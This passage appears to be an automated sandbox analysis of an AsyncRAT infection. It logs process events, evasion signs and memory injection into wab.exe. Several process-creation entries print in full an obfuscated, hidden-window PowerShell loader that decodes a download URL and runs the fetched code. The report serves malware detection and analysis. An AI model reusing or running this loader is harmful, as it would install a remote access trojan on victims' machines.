        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Yara detected AsyncRAT
        Source: Yara matchFile source: 0000000A.00000002.3357559154.0000000023691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: wab.exe PID: 5892, type: MEMORYSTR
        Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 2300000 memory reserve | memory write watchJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 23690000 memory reserve | memory write watchJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 234E0000 memory reserve | memory write watchJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4573Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5338Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5650Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4143Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 7007Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 2813Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3468Thread sleep time: -2767011611056431s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5584Thread sleep count: 5650 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5948Thread sleep count: 4143 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3656Thread sleep time: -4611686018427385s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5276Thread sleep time: -23058430092136925s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5324Thread sleep count: 7007 > 30Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5324Thread sleep count: 2813 > 30Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: wab.exe, 0000000A.00000002.3343246570.0000000007CE8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3343246570.0000000007D40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: powershell.exe, 00000003.00000002.2933062184.0000017BD7B45000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Yara detected Powershell download and execute
        Source: Yara matchFile source: amsi64_5700.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5700, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4324, type: MEMORYSTR
        Writes to foreign memory regions
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3860000Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 230F9ECJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens 'ChronM,jerno istnzDes ei .rdmlSanktlW lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1 Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo /Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st ';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses = Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr. Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. ';Semuljegrynets (Ugedagens 'Re,et$ lectg DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets (Ugedagens 'Netts$ C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling) .nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets (Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens 'Gra.e$ BalsFForese F.ageOmulcrLanitiJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bevogtes140.Out && echo t"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Lassoing = 1;$Rasophore='Sub';$Rasophore+='strin';$Rasophore+='g';Function Ugedagens($Outdure){$Frys=$Outdure.Length-$Lassoing;For($Interproducing=5;$Interproducing -lt $Frys;$Interproducing+=6){$Unlecherous+=$Outdure.$Rasophore.Invoke( $Interproducing, $Lassoing);}$Unlecherous;}function Semuljegrynets($Barbarized){. ($adenoncus) ($Barbarized);}$Currycombing=Ugedagens 'ChronM,jerno istnzDes ei .rdmlSanktlW lliaLevul/Outca5Averr..eman0Uforl Ort,g(HandlWSendei Precn,niffd,edeoo Bor wDioxas W,gg Ko,svNCrossTInope Overl1 indr0Klamm.Op.ak0Mavel;Instr Ro ndWnonfaiBeg.enFlygt6Totaq4Lufth;Bo.ti RadixFylgj6 G.nn4Tachy;ha ss Ek.pr Sy.ev lndi: iece1Tilst2J ntj1Pisto.Antid0Bavn.)Plant oraGKibose,odlicRe,ulk,verfoFli o/Succu2N.ntr0Pulve1hj.ej0Forfa0ubeta1 Ekst0 Fort1Fl,pp LeddFRebediTorskrselvgehumatf,robyoBarvexSkjo /Dress1,ydro2urtid1 cent.Begal0Opera ';$Huaco=Ugedagens ' Zo,lUSkaloskrnereRe rorDema,-StormAEmpreg DisseLandsnMartetM tap ';$Fluernes=Ugedagens 'Serv hCathatUna tt Su,ephe,ges cevi:Du,le/Sil,n/ApprewDiletwA,vaewPlkke. Milis La,reFarmanLadeddCrystsNonh.pEje.ta NivecCurn.eHande.MaadgcCicerochalomAston/Anen,pV.rmtrLyzetoAr,th/IodocdLinielKom.e/AfskewMulti4HomebeEtabl2Preenq Udadb K.st ';$Astrographer=Ugedagens 'Homol>Fossi ';$adenoncus=Ugedagens 'Afmnsi ExhoeSv,nfxInku. ';$Minussernes='Olieraffinaderiets';$Omskrivelses = Ugedagens ' V,rde oplacPopl,hFi ucoBronc Svog%B.lthaKiropp Svamp De,adOut aaU,trytTorrea,push%Shodd\SyndeBS.mshe,aksevSmileoSmalngAlumitUnderePolemsDeam,1Cervi4Dispe0Quadr. Me,lO Sv tuintegtAnt.s V,let&St,ll&Canto For.oeOmlydcStuddhFaktuoAmts OrdretDire. ';Semuljegrynets (Ugedagens 'Re,et$ lectg DirelOrthooS rapb TranaSequelSmerg:StillARe.idpAssaypv.rdelBlreraFol.euPlinksNeuroeM tenr Expls ode=Ka.ao( HardcUn elmPhagodGasco Nonre/Girl,clikvi Jordr$UndskOMaku mPantos Bli k Mor.rretsbi ForsvCharleH,athlAsylssDistieosteosTante)Udski ');Semuljegrynets (Ugedagens 'Netts$ C.okgelevtlSkeigoMisemb elveaRegovlFa,il:littoF pr.moExpanr S brvCons,aBesk.yKandi= Subp$ HopoFBjrgilInteguTapp,eToothr.pegenImpe.eTegnes Hyst.Bes as,igtipfungulS,andi U jetDok m(Punkt$RespeA Kr.dsAdnottG,derrS,mmeoZuluegBrom,rs.ranaEfterpKonflh fhne.umphrRling) .nsl ');$Fluernes=$Forvay[0];$Underabyss= (Ugedagens 'Bogka$rygergRugerlUdsmyoOffe bAcridaSkftelSkift:VegetF Ga eeS.rigepressrBlodsi Em ee Tetr= N.nrN Dybte Te,swFo,ho-ChaveO ymidbH terj Ove.eRullec kul,tUdfri St.tiSDiv,ryTruansMelilt FabiePhilom Mark.Por.uN evoceAristtMalap.QuentWFupmaespectb EncrC InfalBese.i.itike partnSpiset');$Underabyss+=$Applausers[1];Semuljegrynets ($Underabyss);Semuljegrynets (Ugedagens ' Auto$Stap Fnedere PrveeDruggrTurfsiHaplyeFogc.. N,tuHTaurieInexhaB ndedMinice IonirDharasFort [Nrtb $Op,inHK,nsluOkk paDusticDressoTrukn] Moll= .ott$TootiCSynaeumascurSl tsrC,lebyNonlycMerrio EccrmQu tabUnabsi,ingenresungCu,pi ');$aktualitetens=Ugedagens 'Gra.e$ BalsFJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bevogtes140.Out && echo t"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$lassoing = 1;$rasophore='sub';$rasophore+='strin';$rasophore+='g';function ugedagens($outdure){$frys=$outdure.length-$lassoing;for($interproducing=5;$interproducing -lt $frys;$interproducing+=6){$unlecherous+=$outdure.$rasophore.invoke( $interproducing, $lassoing);}$unlecherous;}function semuljegrynets($barbarized){. ($adenoncus) ($barbarized);}$currycombing=ugedagens 'chronm,jerno istnzdes ei .rdmlsanktlw llialevul/outca5averr..eman0uforl ort,g(handlwsendei precn,niffd,edeoo bor wdioxas w,gg ko,svncrosstinope overl1 indr0klamm.op.ak0mavel;instr ro ndwnonfaibeg.enflygt6totaq4lufth;bo.ti radixfylgj6 g.nn4tachy;ha ss ek.pr sy.ev lndi: iece1tilst2j ntj1pisto.antid0bavn.)plant oragkibose,odlicre,ulk,verfofli o/succu2n.ntr0pulve1hj.ej0forfa0ubeta1 ekst0 fort1fl,pp leddfrebeditorskrselvgehumatf,robyobarvexskjo /dress1,ydro2urtid1 cent.begal0opera ';$huaco=ugedagens ' zo,luskaloskrnerere rordema,-stormaempreg disselandsnmartetm tap ';$fluernes=ugedagens 'serv hcathatuna tt su,ephe,ges cevi:du,le/sil,n/apprewdiletwa,vaewplkke. milis la,refarmanladeddcrystsnonh.peje.ta niveccurn.ehande.maadgccicerochalomaston/anen,pv.rmtrlyzetoar,th/iodocdlinielkom.e/afskewmulti4homebeetabl2preenq udadb k.st ';$astrographer=ugedagens 'homol>fossi ';$adenoncus=ugedagens 'afmnsi exhoesv,nfxinku. ';$minussernes='olieraffinaderiets';$omskrivelses = ugedagens ' v,rde oplacpopl,hfi ucobronc svog%b.lthakiropp svamp de,adout aau,tryttorrea,push%shodd\syndebs.mshe,aksevsmileosmalngalumitunderepolemsdeam,1cervi4dispe0quadr. me,lo sv tuintegtant.s v,let&st,ll&canto for.oeomlydcstuddhfaktuoamts ordretdire. ';semuljegrynets (ugedagens 're,et$ lectg direlorthoos rapb tranasequelsmerg:stillare.idpassaypv.rdelblrerafol.euplinksneuroem tenr expls ode=ka.ao( hardcun elmphagodgasco nonre/girl,clikvi jordr$undskomaku mpantos bli k mor.rretsbi forsvcharleh,athlasylssdistieosteostante)udski ');semuljegrynets (ugedagens 'netts$ c.okgelevtlskeigomisemb elvearegovlfa,il:littof pr.moexpanr s brvcons,abesk.ykandi= subp$ hopofbjrgilintegutapp,etoothr.pegenimpe.etegnes hyst.bes as,igtipfunguls,andi u jetdok m(punkt$respea kr.dsadnottg,derrs,mmeozuluegbrom,rs.ranaefterpkonflh fhne.umphrrling) .nsl ');$fluernes=$forvay[0];$underabyss= (ugedagens 'bogka$rygergrugerludsmyooffe bacridaskftelskift:vegetf ga ees.rigepressrblodsi em ee tetr= n.nrn dybte te,swfo,ho-chaveo ymidbh terj ove.erullec kul,tudfri st.tisdiv,rytruansmelilt fabiephilom mark.por.un evocearisttmalap.quentwfupmaespectb encrc infalbese.i.itike partnspiset');$underabyss+=$applausers[1];semuljegrynets ($underabyss);semuljegrynets (ugedagens ' auto$stap fnedere prveedruggrturfsihaplyefogc.. n,tuhtaurieinexhab ndedminice ionirdharasfort [nrtb $op,inhk,nsluokk padusticdressotrukn] moll= .ott$tooticsynaeumascursl tsrc,lebynonlycmerrio eccrmqu tabunabsi,ingenresungcu,pi ');$aktualitetens=ugedagens 'gra.e$ balsfforese f.ageomulcrlaniti
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$lassoing = 1;$rasophore='sub';$rasophore+='strin';$rasophore+='g';function ugedagens($outdure){$frys=$outdure.length-$lassoing;for($interproducing=5;$interproducing -lt $frys;$interproducing+=6){$unlecherous+=$outdure.$rasophore.invoke( $interproducing, $lassoing);}$unlecherous;}function semuljegrynets($barbarized){. ($adenoncus) ($barbarized);}$currycombing=ugedagens 'chronm,jerno istnzdes ei .rdmlsanktlw llialevul/outca5averr..eman0uforl ort,g(handlwsendei precn,niffd,edeoo bor wdioxas w,gg ko,svncrosstinope overl1 indr0klamm.op.ak0mavel;instr ro ndwnonfaibeg.enflygt6totaq4lufth;bo.ti radixfylgj6 g.nn4tachy;ha ss ek.pr sy.ev lndi: iece1tilst2j ntj1pisto.antid0bavn.)plant oragkibose,odlicre,ulk,verfofli o/succu2n.ntr0pulve1hj.ej0forfa0ubeta1 ekst0 fort1fl,pp leddfrebeditorskrselvgehumatf,robyobarvexskjo /dress1,ydro2urtid1 cent.begal0opera ';$huaco=ugedagens ' zo,luskaloskrnerere rordema,-stormaempreg disselandsnmartetm tap ';$fluernes=ugedagens 'serv hcathatuna tt su,ephe,ges cevi:du,le/sil,n/apprewdiletwa,vaewplkke. milis la,refarmanladeddcrystsnonh.peje.ta niveccurn.ehande.maadgccicerochalomaston/anen,pv.rmtrlyzetoar,th/iodocdlinielkom.e/afskewmulti4homebeetabl2preenq udadb k.st ';$astrographer=ugedagens 'homol>fossi ';$adenoncus=ugedagens 'afmnsi exhoesv,nfxinku. ';$minussernes='olieraffinaderiets';$omskrivelses = ugedagens ' v,rde oplacpopl,hfi ucobronc svog%b.lthakiropp svamp de,adout aau,tryttorrea,push%shodd\syndebs.mshe,aksevsmileosmalngalumitunderepolemsdeam,1cervi4dispe0quadr. me,lo sv tuintegtant.s v,let&st,ll&canto for.oeomlydcstuddhfaktuoamts ordretdire. ';semuljegrynets (ugedagens 're,et$ lectg direlorthoos rapb tranasequelsmerg:stillare.idpassaypv.rdelblrerafol.euplinksneuroem tenr expls ode=ka.ao( hardcun elmphagodgasco nonre/girl,clikvi jordr$undskomaku mpantos bli k mor.rretsbi forsvcharleh,athlasylssdistieosteostante)udski ');semuljegrynets (ugedagens 'netts$ c.okgelevtlskeigomisemb elvearegovlfa,il:littof pr.moexpanr s brvcons,abesk.ykandi= subp$ hopofbjrgilintegutapp,etoothr.pegenimpe.etegnes hyst.bes as,igtipfunguls,andi u jetdok m(punkt$respea kr.dsadnottg,derrs,mmeozuluegbrom,rs.ranaefterpkonflh fhne.umphrrling) .nsl ');$fluernes=$forvay[0];$underabyss= (ugedagens 'bogka$rygergrugerludsmyooffe bacridaskftelskift:vegetf ga ees.rigepressrblodsi em ee tetr= n.nrn dybte te,swfo,ho-chaveo ymidbh terj ove.erullec kul,tudfri st.tisdiv,rytruansmelilt fabiephilom mark.por.un evocearisttmalap.quentwfupmaespectb encrc infalbese.i.itike partnspiset');$underabyss+=$applausers[1];semuljegrynets ($underabyss);semuljegrynets (ugedagens ' auto$stap fnedere prveedruggrturfsihaplyefogc.. n,tuhtaurieinexhab ndedminice ionirdharasfort [nrtb $op,inhk,nsluokk padusticdressotrukn] moll= .ott$tooticsynaeumascursl tsrc,lebynonlycmerrio eccrmqu tabunabsi,ingenresungcu,pi ');$aktualitetens=ugedagens 'gra.e$ balsf
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$lassoing = 1;$rasophore='sub';$rasophore+='strin';$rasophore+='g';function ugedagens($outdure){$frys=$outdure.length-$lassoing;for($interproducing=5;$interproducing -lt $frys;$interproducing+=6){$unlecherous+=$outdure.$rasophore.invoke( $interproducing, $lassoing);}$unlecherous;}function semuljegrynets($barbarized){. ($adenoncus) ($barbarized);}$currycombing=ugedagens 'chronm,jerno istnzdes ei .rdmlsanktlw llialevul/outca5averr..eman0uforl ort,g(handlwsendei precn,niffd,edeoo bor wdioxas w,gg ko,svncrosstinope overl1 indr0klamm.op.ak0mavel;instr ro ndwnonfaibeg.enflygt6totaq4lufth;bo.ti radixfylgj6 g.nn4tachy;ha ss ek.pr sy.ev lndi: iece1tilst2j ntj1pisto.antid0bavn.)plant oragkibose,odlicre,ulk,verfofli o/succu2n.ntr0pulve1hj.ej0forfa0ubeta1 ekst0 fort1fl,pp leddfrebeditorskrselvgehumatf,robyobarvexskjo /dress1,ydro2urtid1 